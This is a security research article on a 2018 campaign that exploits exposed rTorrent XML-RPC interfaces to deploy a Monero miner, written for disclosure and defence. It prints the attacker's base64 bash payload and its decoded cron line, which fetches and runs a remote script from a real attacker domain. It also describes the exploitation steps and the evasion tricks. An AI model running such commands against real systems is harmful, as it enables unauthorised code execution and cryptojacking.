Cryptojacking

rTorrent Client Exploited In The Wild To Deploy Monero Crypto-Miner

A previously undisclosed misconfiguration vulnerability in the rTorrent client is being exploited in the wild to mine Monero.
February 28, 2018
8 min. read

F5 threat researchers detected attackers actively exploiting the rTorrent client through a previously undisclosed misconfiguration vulnerability and deploying a Monero (XMR) crypto-miner operation.

  • The rTorrent client misconfiguration vulnerabilities include:
    • No authentication required for XML-RPC communication
    • Sensitive XML-RPC method is allowed (direct OS command execution)
  • Attackers are actively exploiting this vulnerability in the wild by scanning the Internet for exposed rTorrent clients
  • Attackers are using the exploited systems to mine Monero crypto-currency
  • The malware is hosted on the hidden TOR network; the Tor2Web “gateway” is used to access it
  • Currently only 3 of 59 anti-virus agents detect the malware file
  • The campaign employs evasion techniques
  • The campaign is possibly connected to the Zealot Monero mining campaign from late 2017

Recently, the security of torrent clients received public attention1 after Google’s Project Zero researcher Tavis Ormandy2 reported several vulnerabilities in one of the most popular BitTorrent clients, uTorrent. The vulnerabilities were related to the handling of JSON-RPC calls wherein a victim visiting an attacker’s website could be served a malicious JavaScript that would implement a DNS rebinding attack in order to get the authentication secret from the webroot folder. Once successful, the attacker would further compromise the torrent client settings and finally the machine itself using a locally installed torrent client over JSON-RPC.

rTorrent Exploitation

rTorrent3 is a Unix-based torrent client that is implemented in C++. rTorrent optionally supports XML-RPC to allow control by other external programs. XML-RPC is a remote procedure call (RPC)4 protocol5 that uses XML6 to encode its calls and HTTP7 as a transport mechanism. ruTorrent is an example of a web-based front-end that controls the rTorrent client using XML-RPC communication.

Unlike communicating with the uTorrent client, the rTorrent client doesn’t require any authentication and supports a method for direct shell command execution. While this functionality was not meant to be publicly accessible, some threat actors decided to test their luck on the Internet by looking for misconfigured rTorrent clients exposed to the web.

The campaign spotted by F5 researchers consists of two steps: reconnaissance and exploitation. The reconnaissance is performed using POST requests to an XML-RPC endpoint. The attacker tries to invoke the “download_list” method (provides the list of downloaded torrents) as an indication of an installed rTorrent client.

Figure 1: Reconnaissance XML-RPC request to get list of downloaded torrents

Figure 1: Reconnaissance XML-RPC request to get list of downloaded torrents

The request is sent to the “/RPC2” URL, as would be the case for common XML-RPC communication, but the endpoint URL is defined by the torrent client user in the web server configuration and could be configured to other values.

If there is indeed a running rTorrent instance, it responds with a “200 OK” status code, and a list of hashes of the download list files.

Figure 2: rTorrent response example

Figure 2: rTorrent response example

Once the result is positive, the attacker initiates the exploitation by sending another POST request that calls the “execute” method, which allows the attacker to run arbitrary shell commands on the host.

Figure 3: Request calling the "execute" method to run shell commands

Figure 3: Request calling the "execute" method to run shell commands

Payload Analysis

The attacker executes the bash (Unix shell) command with a base64 encoded payload.

echo KGNyb250YWIgLWwgMj4vZGV2L251bGx8c2VkICcvd2dldC9kJzsgZWNobyAiNSAqICogKiAqIHdnZXQgLXFPLSBseXpoZW5rby5ydS8ucnxiYXNoIil8Y3JvbnRhYiAtCg== |base64 -d|bash

Figure 4: Base64-ecnoded payload as bash argument
 

The payload is decoded using a Unix built-in base64 command and is executed by piping it to another bash.

(crontab -l 2>/dev/null|sed '/wget/d'; echo "5 * * * * wget -qO- lyzhenko.ru/.r|bash")|crontab –

Figure 5: Decoded spearhead payload
 

This command creates a crontab task that is executed every hour. The task downloads a file from the attacker’s server and pipe its content directly to bash, which results in the execution of the script without saving it on the hard drive.

Figure 6: The downloaded bash script

Figure 6: The downloaded bash script

The bash script sets up some environment variables and prevents logging of any output from the running script. It also changes the memory page’s size to 128, likely to increase the performance8 of the mining process.

Removing Competitors

The script tries to stop other miners from running (competitors or older versions of its own miners) if they are present. It has quite a comprehensive list of miner process identifiers, from common miner program names like “miner” and “xmr” to specific file names such as “wnTKYg”, “imWBR” and “ddg”, that are related to another mining campaign9. It also searches for common miner program arguments such as “stratum” (mining protocol) and miners that pretend to be ssh deamon (for example, sshd).

Figure 7: Stopping other miners if present

Figure 7: Stopping other miners if present

Downloading Malware from The Hidden Network

The malware sleeps for random periods (likely an evasion technique), and then downloads the mining malware with the correct OS architecture (x64 or x32).

Figure 8: Downloading the miner malware

Figure 8: Downloading the miner malware

Interestingly, the file is served from a Tor network using the Tor2Web “gateway” service to make detection and shutdown of the attacker’s website more difficult. Tor2Web allows Tor hidden services to be accessed from a standard browser without being connected to the Tor network. This technique has been used by attackers for several years.

Zealot Connection?

Looking more closely, the malware download request contain a custom user-agent header with the value of “-”. Interestingly, the same unique user-agent was also used in the Zealot campaign, leading us to speculate that both campaigns are executed by the same threat actor.

Figure 9: HTTP request targeting STRUTS in the Zealot campaign

Figure 9: HTTP request targeting STRUTS in the Zealot campaign

The user-agent is a bit unique as attackers typically would use a legitimate browser user-agent to better masquerade their traffic, or a user agent that includes a default HTTP library name (for example, “python-requests/2.18.4”). In this case, the user-agent doubles as a deception technique to trick researchers or scanners that access the server with their Internet browser or tool and get a “403 Forbidden” response instead of the real content. This technique is being used more frequently by sophisticated attackers nowadays.

Figure 10: Malware hosting server response for User-Agent other than “-”

Figure 10: Malware hosting server response for User-Agent other than “-”

The downloaded malware is a Monero (XMR) crypto-currency miner. Currently, the executable is barely detected by anti-virus agents. At the time of this writing, only 3 of 59 anti-virus agents detected it as malicious.

Figure 11: 3 of 59 anti-virus agents are currently detecting the malware using the VirusTotal service

Figure 11: 3 of 59 anti-virus agents are currently detecting the malware using the VirusTotal service

Mining Monero (XMR) Currency

The mining pool and Monero wallet addresses is in the malware file strings.

Figure 12: Mining pool and wallet addresses revealed in malware file strings

Figure 12: Mining pool and wallet addresses revealed in malware file strings

The mining addresses are:

45e9rBtQwSXfdLn6avycd1bMp6RJTsNfwdPrMPWbz8crBXzPeGPLM6t8QE3s6JS5LNJUGMGmibF9yZhjVoCbUvz989EsT6h

44Sqc2Zcgz7ROLQcGRXtFsMbwNQIX5HExWMxD9tfxXRDBBiu2pf2j6VhvjD6i7D8MLNYzn73efgxEIwfweVG626MIdl2uxC

Looking at the mining addresses we can see that the attacker has gained approximately $3,900 from this campaign for one of the addresses. The attacker’s current hash rate will produce the attacker about $43 per day. Currently, the second address doesn’t have a balance.

Figure 13: Mining addresses balance

Figure 13: Mining addresses balance

Summary

As crypto-mining campaigns become more profitable than other cybercrime business models, attackers are becoming more creative and finding new ways to extend their operations. In this example, we are seeing crypto-criminals moving into an interesting attack vector target: misconfigured BitTorrent clients. As a protection, rTorrent users are advised to make sure that their clients are not accepting connections from the outside world, and that the listening sockets are bound to the localhost. Or better yet, avoid XML-RPC functionality that is not shipped with the default installation. It’s worth noting that the author of rTorrent explicitly recommends not using the RPC functionality over TCP sockets.

As we continue to analyze this miner malware, we will update this article with new findings.

Join the Discussion
Authors & Contributors
Andrey Shalnev (Author)
Security Researcher
Footnotes

1 https://threatpost.com/utorrent-users-warned-of-remote-code-execution-vulnerability/130030/

2 https://twitter.com/taviso/status/935690253091741697

3 https://github.com/rakshasa/rtorrent

4 https://en.wikipedia.org/wiki/Remote_procedure_call

5 https://en.wikipedia.org/wiki/Communications_protocol

6 https://en.wikipedia.org/wiki/XML

7 https://en.wikipedia.org/wiki/HTTP

8 https://steemit.com/monero/@tobiasrieper/improve-your-cpu-monero-xmr-mining-up-to-20-with-huge-pages

9 http://blog.netlab.360.com/ddg-a-mining-botnet-aiming-at-database-server-en/

 

What's trending?

Forward and Reverse Shells
Forward and Reverse Shells
09/15/2023 article 5 min. read
Web Shells: Understanding Attackers’ Tools and Techniques
Web Shells: Understanding Attackers’ Tools and Techniques
07/06/2023 article 6 min. read
What Is Zero Trust Architecture (ZTA)?
What Is Zero Trust Architecture (ZTA)?
07/05/2022 article 13 min. read